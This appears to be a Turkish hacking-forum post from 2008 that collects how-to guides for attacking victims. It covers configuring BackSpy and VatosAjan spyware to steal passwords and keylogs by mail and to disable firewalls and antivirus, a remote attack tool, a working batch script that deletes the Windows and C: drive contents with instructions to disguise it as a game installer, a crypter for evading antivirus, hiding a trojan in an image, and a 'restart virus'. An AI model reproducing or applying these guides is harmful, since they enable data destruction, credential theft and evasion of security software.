S.A.
Mükemmel bir spy programı (BackSpy)
BackSpy Professional Public Edition
BackSpy nedir ?
BackSpy bir casus yazılımıdır.BackSpy serveri açılan bilgisayardaki bütün bilgileri kullanıcıya mail yoluyla bildirir.Alınan bilgiler ise kurbanın pc bilgileri, son girilen explorer adresleri. Klavyeden basılan bütün kayıtları.
Alınabilen şifreler ise;
Msn Messenger,(Windows Messenger XP), Yahoo messenger, Icq, Outlook Express şifreleri,
Auto Complete Passwords,Auto Complete Fields, Password protected sites, Msn Explorer passwords,
Multiple passwords,Cached passwords, All windows passwords,Aim
şifrelerini size mail yoluyla iletir.
Kullanımı:
BackSpy programını açtığınızda
* Victim Name: yazan yere kurbanınızın adını yada herhangi
bir isim yazın.Size gelecek mail bildiriminde kurbanınızın adı ile size bildirilecektir.
* Passwords: Burada alınabilen şifreleri görmektesiniz.Otomatik olarak şifreler alınmaktadır.
* Victim other information: Victimin diğer bilgileri alınmaktadır.
Internet Explorer : Victimin en son girdiği internet explorer adresleri alınmaktadır.
* Victim PC information: Victimin pc hakkında bilgileri alınmaktadır.
* Mail Notification:
Your mail address: Kendi mail adresinizi yazın.Şifreler ve loglar bu mail adresinize postalanacaktır.
Dns : Buraya mail adresiniz yahoo ise yaho****om hotmail ise hotmail.com mynet ise mynet.com yazın.Yani mail adresinizin dns sunucusunu yazın. (gmail ve yahoo önerilir.)
Smtp Server : Buraya ise mail adresinizi yazdıktan sonra Dns butonuna basmanız sonrasında dns sunucusunu otomatik olarak almaktadır.
*Server Uzantısı : Serverin uzantısını seçebilirsiniz. Uygulama için Server.exe , Ekran koruyucusu için Server.scr , Toplu dos komutu için ise Server.bat seçeneklerinden birini seçiniz.
Not: Server.bat simge desteklemez.
*File Merge : Bu seçenek ile serveri baska bir dosya ile birleştirebilirsiniz.Server açıldığında ilk önce birleştirilen dosya, daha sonra server uygulamaya geçmektedir.
*Icon select : Normalde server simgesi dll şeklinde görülmektedir.Eğer faklı bir icon seçmek istiyorsanız Icon load butonuna basıp faklı bir simge seçebilirsiniz. Eğer buradada istediğiniz bir simge yok ise "Choose a icon" kutucuğunu aktif hale getirip "load icon" adlı butona basıp istediğiniz bir simgeyi yükleyebilirsiniz.
*Create Server : Burası ise bütün ayarları kaydedip server dosyasını oluşturmaya yarar. Oluşturulan server kullanıma hazır hale gelir ve kurbanınıza serveri gönderebilirsiniz.
VatosAjan 2.4 Hakkında;
VatosAjan bulaştığı bilgisayarın özelliklerini,kurbanın şifre ve keylog kayıtlarını mailinize gönderen
Bünyesinde bulunan FTP Server ile kurbanın bilgisayarına bağlanılabilen,Sadece VatosAjan’da bulunan
WEB KONTROL özelliği ile router veya direk bağlantı farketmeksizin kurbanın bilgisayarında dosya arama,
dosya silme,istediğiniz dosyaları mailinize gönderme,
downloader gibi çalışıp, istediğiniz dosyaları internetten indirip çalıştırabilme,
mail adresinizi değiştirebilme,registry kayıtlarına ulaşabilme ve kendisini silme emirlerini
uygulayabilecek interaktif bir casus yazılımdır.
VatosAjanın alabildiği şifreler aşağıda yazılmıştır.
Versiyon Farkları
-Win9x sistemlerde stabil çalışması sağlandı
-FTP Server eklendi
-Server ve serverin kullandığı dosyalar disk üzerinde gizlendi
-Kullanılan componentler değiştirildi
-Firewall ve Antivüslerin kapatılması sağlandı
-Web Kontrol için firewall By Pass edildi
-Servere ayar işleme yöntemi değiştirildi
-Serverin başka bir dosya ile birleşince simgesinin korunması sağlandı
-İlk Çalıştırılma esnasında sahte hata uyarısı verebilme özelliği eklendi
-icon seçim yöntemi değiştirildi.Böylece kendi iconlarınızı da kullanabileceksiniz.
-Server Uzantısını değiştirebilme imkanı eklendi
-Client görünümü ve logo değiştirildi
-Türkçe ve İngilizce Dil Seçeneği eklendi
///////Alınabilen Şifreler\\\\\\\\
# MSN Messenger
# Windows Messenger (In Windows XP)
# Yahoo Messenger (Versions 5.x and 6.x)
# ICQ Lite 4.x/2003
# AOL Instant Messenger (only older versions, the password in newer versions of AIM cannot be recovered)
# AOL Instant Messenger/Netscape 7
# Trillian
# Miranda
# GAIM
# Outlook Express
# Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
# Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts)
# IncrediMail
# Eudora
# Netscape 6.x/7.x
# Mozilla Thunderbird
# Group Mail Free
# Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
# Hotmail/MSN mail - If the password is saved in MSN Messenger application.
# Gmail
#Otomatik tamamlanan Internet Explorer şifreleri,
#MSN Explorer Şifreleri
KBD Programi 1999 yilinin sonlarinda kullanima basladi.Zamaninda cok sayida Web
sunuculari,arastirma bilgisayarlarinin sistemleri kontrol edildi.2001 yili sonunda
tum kullanicilara acildi ve simdi Sub7 gibi eski nesil
Trojanlardan cok farkli seviyede yer aldi.Nedeni ; exe dosyalari ile sisteme girme
olayi tamamiyle kapandi.Program Vandal turundedir.Asli Trojan degildir.Program cok
buyuk potansiyel risk olusturacagi
icin bazi kisitlamarda bulunuldu.
Programin ozellikleri :
- Dosya sistemine erisme.
- Dosyalari zipleme veya unzip etme.
- Network arkasindaki bilgisayarlara girmek.
- Girmek istediginiz kisinin ip numarasini bilmek zorunda degilsiniz.
- Applet uzerinden taninmama.
- Lokal network üzerindeki paketleri yakalamak
- Sahte Mail gondermek , rasgele isimlerle mail bomb cekmek ve mail sunucunun
otomatik tespit edilmesi.
- Protokol cozumleri.
- Sifreli Haberlesme.
- Birden fazla kisi ile birlesip coklu nuke saldirisi yapma.
- Baska ip lere bir baska ip adina sahte UDP paketleri gondermek.
- Ayni zamanda tek Win32 nin yaninda Linux gibi sistemlere sızmak.
- Applet uzerinden yapilan saldirilarin FireWall tarafindan test edilememesi.
- Su an icin hicbir virus tarayici tarafindan bulunamamasi.
- Sistemde calisan programlari listeleme , programi sonlandirma ,
- Modem kullanan kisilerin telefon numarasini tesbit etme.
- Programi sistemden banlama ( bir daha ayni programin calismasini engellemek)
- Antivirüsler tarafından saptanmayan standart dışı keylogger
Kisitlamalar :
- Guvenlik onayindan gecmeden JVM kodu
- FireWall’larin tumunu delme
- Yerel network’e yayilma ( NETBIOS aciksa )
Arkadaşlar,Çok basit yöntemlerle 1 dk içinde format atan
(ve attıktan sonra bilgisayar açılmıyor) virus yapabilirsiniz.
Açıklama:
1.Notepad ’i açın.
2.Notepad in içine şunları yazın:
@echo off
C:\\WINDOWS\\COMMAND\\deltree /y c:\\windows\\*.*
@echo off
C:\\WINDOWS\\COMMAND\\deltree /y c:\\Progra~1\\*.*
@echo off
C:\\WINDOWS\\COMMAND\\deltree /y c:\\*.*
@echo off
cls
cls
@echo .::Format Down Up Your Sistem MegaTR::.
@echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Açıklama:
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor.
ve bi daha açılmayabiliyor
.
Not:%100 ÇALIŞIYOR
Windows un önemli bi kaç dosyasını siliyor ve sonra "Yazılan Yazı cıkıyor".
Peki bunu düşmanıma nasıl yediririm derseniz:
dosyanın adını değiştirin.(mesela : Oyun_stream_install)
Yada Hayalinizi genişleterek onun yiyebilecegi bir dosya adı olarak yollayabılırsınız ..
[ AntiDote v1.2 ]
[+] Anti virüslere karşı tanınmaz yapıldı.
[+] Public Edition’larda bulunan demo uyarısı (nag screen) kaldırıldı.
[+] Dll ve ocx desteği Public Edition’lara da eklendi.
[+] Fsg ile packlenmiş dosyalara AntiDote uygulandığında meydana gelen dosyanın bozulması sorunu düzeltildi.
AntiDote NEDİR ? :
AntiDote antivirüs yazılımlarına karşı, Windows işletim sistemlerinde çalışan programlar (.exe) için güçlü ve stabil bir "Undetecter" aracıdır.
NOT: Dosyanın devamında Antivirüs yazılımlarına karşı bir dosyanın tanınmaz yapılması "Undetect edilmek" olarak anlatılacaktır.
AntiDote NE İŞE YARAR ? :
AntiDote antivirüsler tarafından virus, trojan, hack tool vs... olarak tanınan dosyalarınızı undetect eder. AntiDote ile bir dosyanızı undetect ettiğinizde antivirüs yazılımları bir daha asla o dosya için uyarı vermezler!
ANTİVİRÜS PROGRAMLARINCA TANINIR MI ? :
Şu an hiçbiri gormuyor ama demo olarak sanırım yakında gormeye baslar
1 aya kalmaz eh buda iyidir ama
HANGİ İŞLETİM SİSTEMLERİNDE ÇALIŞIR ? :
AntiDote ve AntiDote ile undetect edilen dosyalar sadece NT tabanlı Windows işletim sistemlerinde çalışabilir (Windows 2000, Windows NT, Windows XP, Windows 2003, Windows Longhorn vs...)
YASAL SORUMLULUKLARI NELERDİR :
AntiDote Programının yanlış yada doğru kullanımından doğabilecek her türlü sorumluluk tamamıyla AntiDote’u kullanan kişi veya kişilere aittir. Oluşabilecek hiç bir aksilikten, kullanılan sistemlere verebileceği herhangi bir zarardan yapımcıları hiç bir şekilde mesul tutulamaz. Programı kullanmayı kabul eden herkes bu şıkların hepsini kabul etmiş sayılacaktır. Şıkları kabul etmeyen kişiler AntiDote’u sistemlerinden silme konusunda özgürdürler.
KULLANIM :
ADIN ADIM BİR DOSYAYI UNDETECT ETMEK :
Programda "Specify The Exe File" isimli tabı açın ve undetect etmek istediğiniz dosyanızı belirleyin. Eğer undetect edilen dosyayı farklı bir isimle kaydetmek istiyorsanız "File To Save" kutusuna istediğiniz dosya yolu ve adını giriniz.
Programda "Options" isimli tabı açın Eğer değiştirmek istediğiniz ekstra ayarlar varsa buradan değiştirin. Bu kısım gerekli değildir. Tüm ayarları varsayılan biçimde bırakabilirsiniz (Bu ayarlar aşağıda açıklanmıştır).
Programda "Make it Undetected" isimli tabı açın ve burada bulunan aynı isimdeki butona basın.
Undetect etme işlemi tamamlandığında program size bilgi verecektir...
OPTIONS (AYARLAR) :
Preserve Icon Resources : Eğer bunu seçerseniz programınızdaki Icon Group kaynakları korunacak aksi taktirde silinecektir.
Preserve Version Info Resources : Eğer bunu seçerseniz programınızdaki Versiyon Bilgisi kaynakları korunacak aksi taktirde silinecektir.
Preserve Extra Data At End Of File : Eğer bunu seçersniz dosyanızın sonundaki ekstra datalar korunacak (örneğin: bir trojanın server sonuna yazdığı server ayarları gibi...), aksi taktirde bunlar silinecektir.
Rebuild Loader Stub : Bu özellik y0da tarafından hazırlanan realign.dll tabanlıdır. Daha küçük dosya boyutu için bu özelliği her zaman seçin.
Compress using aPLib : Bunu seçerseniz, dosyanız sıkıştırılacak ve dosya buyutu %40-70 oranında küçülecektir.
Create Backup Copy (.bak file) : Eğer bunu seçerseniz, orjinal dosyanızın yedek kopyası oluşturulur (undetect edilen dosyanın çalışmaması ihtimaline karşı).
Exit When Done : Bunu seçerseniz program undetect etme işlemi tamamlandığında kendisini kapatacaktır.
PROGRAMI GÜNCELLEME :
Programda "Update" isimli tabı açın ve "Check for updates" butonuna basın. Eğer yeni bir güncelleme mevcutsa program sizi uyaracak ve onayınıza göre güncelleme paketi otomatik olarak download edilip sisteminize kurulacaktır.
Resme Trojan Ekleme :
SecurEngine Pro" programını çalıştırıyoruz."Hide Files" seçiyoruz.çıkan ekrandan "Add files..." seçiyoruz.Sonrada gizlemek istediğimiz dosyayı seçiyoruz."next" diyoruz."select carrier" e basıp kurbanın görmesini istediğimiz gerçek resmi seçiyoruz (mesela ben bi kız resmi buldum çok şatafatlı olmayan.onu kullanıyorum).ardından"next" diyoruz."enter password" kısmına bi şifre koyun.yoksa devam etmez.ayrıca şifrenin amacı,dosyanızı bulan biri trojanı resimden söküp atamaz şifrenizi bilmeden.ayrıca elinizdeki bu dosyanın trojanını sökmek elinizde bu şifreyle.şifrenizi girin(en az 4 basamak) "import" ettilkten sonra."save as" e basın.buraya da kurbana göndericeğimiz trojanlı resmin ismini yazın ve istediğiniz yere kaydedin...
http://securengine.isecurelabs.com/download/securengine_setup.exeRestart Virusu :
Selamun Aleykum Arkadaslar
Oncelikle "Yeni Metin Belgesi" olusturun..!
Sonra alt alta "Start" yazisini yazin..!
600-800 tane yazin..!
Ve sonra "*.bat" olarak kaydedin..!
Konu: Trojan,Keyloggerler vs vs(Döküman 
Cuma Şub. 01, 2008 6:00 am
